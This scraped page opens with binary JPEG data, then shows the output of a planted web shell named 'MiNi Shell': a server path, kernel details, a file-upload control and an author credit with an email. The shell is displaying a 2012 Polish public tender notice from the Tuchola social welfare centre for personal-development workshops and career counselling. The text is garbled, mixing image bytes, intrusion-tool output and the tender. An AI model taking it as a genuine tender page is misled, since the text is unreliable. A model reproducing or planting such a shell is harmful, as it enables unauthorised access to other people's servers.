JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120806/287796-N-2012.html

<p class="kh_header"><b>Tuchola: Usługi w dziedzinie rozwoju osobistego i doradztwa dla klientów/ek Ośrodka Pomocy Społecznej w Tucholi w ramach projektu systemowego Uwierz w swoje możliwości w 2012r.</b><br>
<b>Numer ogłoszenia: 287796 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Tucholi , ul. Świecka 45, 89-500 Tuchola, woj. kujawsko-pomorskie, tel. 52 334 89 50, faks 52 336 00 62.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w dziedzinie rozwoju osobistego i doradztwa dla klientów/ek Ośrodka Pomocy Społecznej w Tucholi w ramach projektu systemowego Uwierz w swoje możliwości w 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usług z dziedziny rozwoju osobistego i doradztwa w dwóch blokach tematycznych, opisanych poniżej, w ramach projektu systemowego pn. Uwierz w swoje możliwości w ramach Priorytetu VII Promocja Integracji Społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
BLOK I. Warsztaty z zakresu rozwoju osobistego (zajęcia z doradcą zawodowym i psychologiem)
1 godzina zajęć w bloku tematycznym = 45 minut.
Termin realizacji w 2012 r. (jedna grupa - 5 kolejnych dni powszednich od daty podpisania umowy do 20.09.2012r.)
- grupa licząca 11 osób (klienci i klientki Ośrodka Pomocy Społecznej w Tucholi) - 40 godzin zajęć, w tym 20 godzin zajęć z doradcą zawodowym, 20 godzin zajęć z psychologiem (pięć spotkań w ciągu w dni powszednie po 4 godziny dziennie z każdym z w/wym specjalistów w systemie do południa doradca zawodowy, po południu psycholog lub odwrotnie), 
1) Świadczenie usług powinno odbywać się na terenie Tucholi, od poniedziałku do piątku z wyłączeniem świąt w przedziale czasowym 8.00-17.00 ( w tym 2 przerwy po 15 minut w trakcie zajęć, jedna do południa, druga popołudniu oraz 0,5 godzinna przerwa obiadowa)
2) Wykonawca zobowiązany jest do świadczenia usług z należytą starannością zgodnie z najlepszymi praktykami przyjętymi przy świadczeniu usług szkoleniowych.
3) Wykonawca przedstawi przed podpisaniem umowy Program warsztatów zwany dalej Programem.
4) Wykonawca winien świadczyć usługi z udziałem osób posiadających odpowiednie kwalifikacje do przeprowadzenia warsztatów zgodnie z Programem. Zabrania się Wykonawcy dokonywania zmian w Programie bez uprzedniej zgody Zamawiającego.
5) Wykonawca zobowiązany jest zapewnić uczestnikom materiały dydaktyczne niezbędne do udziału w warsztatach opatrzone w logo EFS, UE, PO KL.
6) W trakcie każdego dnia odbywanych zajęć edukacyjnych Wykonawca zobowiązany jest zapewnić uczestnikowi pakiet socjalny: 
a) napoje (kawa, herbata, cukier, śmietanka do kawy - bez ograniczeń, sok - 0,5 l, woda - 1 l), 
b) 2 kostki ciasta (około 7x5 cm), np. jabłecznik, , ciasto z kremem, ciasto z galaretką i owocami,
c) obiad dwudaniowy składający się z: zupy (350 ml), sztuki mięsa (150 g), ziemniaków/frytek/ryżu (200 g), surówki z świeżych warzyw (150 g), napoju w kartoniku z rurką (200 ml). 
7) Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników warsztatów.
8) Wykonawca niezwłocznie po rozpoczęciu warsztatów wypełnia i przekazuje w formie pisemnej i elektronicznej (przetarg_ops@tuchola.pl) Zamawiającemu harmonogram warsztatów - załącznik nr 2. W przypadku wystąpienia jakichkolwiek zmian w harmonogramie Wykonawca zobowiązany jest w terminie dwóch dni roboczych od zaistniałej sytuacji ponownie przekazać wypełniony harmonogram z uwzględnieniem wprowadzonych zmian w formie jak wyżej.
9) Wykonawca zobowiązany jest po zakończeniu warsztatów w terminie trzech dni roboczych dostarczyć Zamawiającemu oryginały list obecności - załącznik nr 1.
10) Wykonawca zobowiązany jest po zakończeniu warsztatów w terminie trzech dni roboczych dostarczyć Zamawiającemu kserokopie:
a) wydanych zaświadczeń potwierdzających udział w warsztatach - załącznik nr 3 oraz rejestrów potwierdzających ich wydanie - załącznik nr 4,
b) list potwierdzających odbiór materiałów dydaktycznych, rodzaj wydanych materiałów dydaktycznych, datę i podpis uczestnika.
11) Zamawiający dostarczy baner/plakat informujący o realizacji projektu, który Wykonawca zobowiązuje się umieścić w widocznym miejscu w sali, w której odbywają się zajęcia, Natomiast drzwi zewnętrzne, gdzie odbywać się będą zajęcia Wykonawca zobowiązany jest oznakować notatką zawierającą informację o treści: Warsztaty z zakresu rozwoju osobistego w ramach projektu systemowego Ośrodka Pomocy Społecznej w Tucholi pn. Uwierz w swoje możliwości współfinansowane są ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
12) Zamawiający przekaże Wykonawcy listę uczestników w formie pisemnej i elektronicznej, nie później niż w terminie dwóch dni przed ustalonym rozpoczęciem warsztatów. Lista zawierać będzie dane osobowe uczestnika projektu.
13) W przypadku każdorazowej absencji uczestnika warsztatów lub przerwania warsztatów Wykonawca zobowiązany jest po jednym dniu nieobecności zawiadomić Zamawiającego, składając pisemną informację drogą elektroniczną (przetarg_ops@tuchola.pl) lub faksem na nr 052 33 60 062.
14) Zamawiający zastrzega sobie prawo skierowania kolejnego uczestnika w miejsce osoby, która przerwała warsztaty w przypadku, gdy nie przekroczyły one 20 % całości czasu ich trwania. Zamawiający w porozumieniu z Wykonawcą w uzasadnionych przypadkach może skierować kolejnego uczestnika w miejsce osoby, która przerwała warsztaty w przypadku, gdy warsztaty przekroczyły 20% całości czasu trwania warsztatów.
15) Wykonawca nie może dokonać usprawiedliwienia nieobecności uczestnika warsztatów. Usprawiedliwienia może dokonać pracownik socjalny zaangażowany w realizację projektu. Usprawiedliwienie nieobecności uczestnika warsztatów na zajęciach następuje na podstawie zwolnienia lekarskiego wystawionego przez lekarza.
16) Wykonawca wystawi zaświadczenie potwierdzające uczestnictwo w warsztatach przy nieobecności nie przekraczającej 20% całości czasu trwania warsztatów lub przekraczającej 20 % całości trwania warsztatów w przypadkach, o których mowa w pkt 14 zdanie 2. 
17) Zamawiający zapłaci Wykonawcy tylko za osoby, które ukończyły warsztaty, tj. otrzymały zaświadczenia, o których mowa w pkt 10 ppkt a). Wykonawca po zaakceptowaniu przez Zamawiającego dokumentów wymienionych w pkt 9 i 10 przedłoży Zamawiającemu rachunek lub fakturę. Zamawiający w terminie do 30 dni od daty wpływu rachunku lub faktury do siedziby Zamawiającego należność ureguluje przelewem na konto bankowe Wykonawcy 

BLOK II. INDYWIDUALNE DORADZTWO ZAWODOWE 
1 godzina zajęć w bloku tematycznym = 60 minut.
Termin realizacji: 1 dzień do 21.09.2012r. (po zakończeniu zajęć opisanych w bloku I). 
- 10 osób (klienci i klientki Ośrodka Pomocy Społecznej w Tucholi) - 4 godzin zajęć    z doradcą zawodowym dla 8 uczestników projektu (1 spotkanie z uczestnikiem)
1) Świadczenie usług powinno odbywać się na terenie Tucholi, od poniedziałku do piątku z wyłączeniem świąt w przedziale czasowym 8.00-17.00.
2) Wykonawca zobowiązany jest do świadczenia usług z należytą starannością zgodnie z najlepszymi praktykami przyjętymi przy świadczeniu usług szkoleniowych.
3) Wykonawca winien świadczyć usługi z udziałem osób posiadających odpowiednie kwalifikacje do przeprowadzenia indywidualnego doradztwa zawodowego.
4) Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników zajęć.
5) Wykonawca niezwłocznie po rozpoczęciu zajęć wypełnia i przekazuje w formie pisemnej 
i elektronicznej (ops_przetargi@tuchola.pl) Zamawiającemu harmonogram zajęć - załącznik nr 2. 
W przypadku wystąpienia jakichkolwiek zmian w harmonogramie Wykonawca zobowiązany jest w terminie dwóch dni roboczych od zaistniałej sytuacji ponownie przekazać wypełniony harmonogram z uwzględnieniem wprowadzonych zmian w formie jak wyżej.
6) Wykonawca zobowiązany jest po zakończeniu zajęć w terminie trzech dni roboczych dostarczyć Zamawiającemu oryginały:
a) list obecności - załącznik nr 1,
b) Indywidualnych Planów Działania (IPD).
7) Wykonawca zobowiązany jest po zakończeniu zajęć w terminie trzech dni roboczych dostarczyć Zamawiającemu kserokopie wydanych zaświadczeń potwierdzających udział w zajęciach - załącznik nr 3 oraz kserokopie rejestrów potwierdzających ich wydanie - załącznik nr 4.
8) Zamawiający dostarczy baner/plakat informujący o realizacji projektu, który Wykonawca zobowiązuje się umieścić w widocznym miejscu w sali, w której odbywają się zajęcia. Natomiast drzwi zewnętrzne, gdzie odbywać się będą zajęcia Wykonawca zobowiązany jest oznakować notatką zawierającą informację o treści: Indywidualne doradztwo zawodowe w ramach projektu systemowego Ośrodka Pomocy Społecznej w Tucholi pn. Uwierz w swoje możliwości współfinansowane są ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
9) Zamawiający przekaże Wykonawcy listę uczestników w formie pisemnej i elektronicznej, nie później niż w terminie dwóch dni przed ustalonym rozpoczęciem zajęć. Lista zawierać będzie dane osobowe.
10) W przypadku absencji uczestnika zajęć lub przerwania zajęć Wykonawca zobowiązany jest po jednym dniu nieobecności zawiadomić Zamawiającego, składając pisemną informację drogą elektroniczną (ops_przetargi@tuchola.pl) lub faksem na nr 052 33 60 062.
11) W przypadku nieobecności uczestnika Zamawiający zastrzega sobie prawo wyznaczenia nowego terminu zajęć.
12) Zamawiający zapłaci Wykonawcy tylko za osoby, którym sporządzono Indywidualny Plan Działania. Wykonawca po zaakceptowaniu przez Zamawiającego dokumentów wymienionych w pkt 6 i 7 przedłoży Zamawiającemu rachunek lub fakturę. Zamawiający w terminie do 30 dni od daty wpływu rachunku lub faktury do siedziby Zamawiającego należność ureguluje przelewem na konto bankowe Wykonawcy. 
13) W przypadku skierowania przez Zamawiającego na zajęcia nowego uczestnika projektu 
w miejsce osoby, która przerwała zajęcia, Zamawiający zapłaci Wykonawcy cenę jak za jednego uczestnika zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.23.20-8, 85.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający żąda załączenia: 1) wypełnionego formularza oferty - załącznik nr 2; 2) Oświadczenia, że wykonawca spełnia warunki określone w SIWZ wynikające i określone w art. 22 ust. 1 ustawy Pzp - załącznik nr 3. Zamawiający uzna, że warunek jest spełniony, jeśli wykonawca złoży oświadczenie w zakresie art. 22 ust. 1 ustawy. Ocena spełniania warunku zostanie dokonana wg reguły spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazu wykonywanych usług szkoleniowych dotyczących rozwoju osobistego (zajęcia z psychologiem i doradcą zawodowym) - pod uwagę brane będą oferty, w których wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, prowadził min. 1 kursy z rozwoju osobistego każde po min. 40 godzin (20 godz. zajęć z doradcą zawodowym, 20 godz. zajęć z psychologiem) - wymagana 1 referencja - załącznik nr 4 do SIWZ. Zamawiający uzna, że warunek jest spełniony, jeśli wykonawca złoży oświadczenie w zakresie art. 22 ust. 1 ustawy. Ocena spełniania warunku zostanie dokonana wg reguły spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazu osób (min. po 1 psychologu, 1 doradcy zawodowym), które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami - załącznik nr 5 do SIWZ. - ukończone studia w szkole wyższej, zakończone uzyskaniem dyplomu z tytułem magistra. Preferowane wykształcenie wyższe kierunkowe: zgodnie z przedmiotem zamówienia (psycholog/doradca zawodowy). W przypadku ukończenia studiów na pokrewnych lub innych kierunkach niezbędne jest posiadanie ukończonych studiów podyplomowych z zakresu doradztwa zawodowego - dotyczy doradcy zawodowego - należy załączyć kserokopie dyplomów do oferty. zawodowego. Wykonawca może do oferty załączyć oświadczenie, iż ww. osoba wymagane aktualne uprawnienia potwierdzające ww. kwalifikacje. Zamawiający uzna, że warunek jest spełniony, jeśli wykonawca złoży oświadczenie w zakresie art. 22 ust. 1 ustawy. Ocena spełniania warunku zostanie dokonana wg reguły spełnia/nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla poprawności złożenia oświadczenia woli Wykonawca zobowiązany jest załączyć do oferty aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy - załącznik nr 7 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Zamawiający zastrzega sobie możliwość wprowadzenia zmian do zawartej umowy w następujących sytuacjach:
1)	Zawieszenie lub rezygnacja zamawiającego z wykonania części świadczonych usług.
2)	Zmiany w kolejności i terminach wykonywania usług.
      3)  Zmiana ustawowa stawki VAT.
      4)  Zmiana wynagrodzenia.
Zmiany postanowień niniejszej umowy mogą nastąpić za zgodą obu stron w formie pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.tuchola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej, ul. Świecka 45, 89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej, ul. Świecka 45, 89-500 Tuchola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com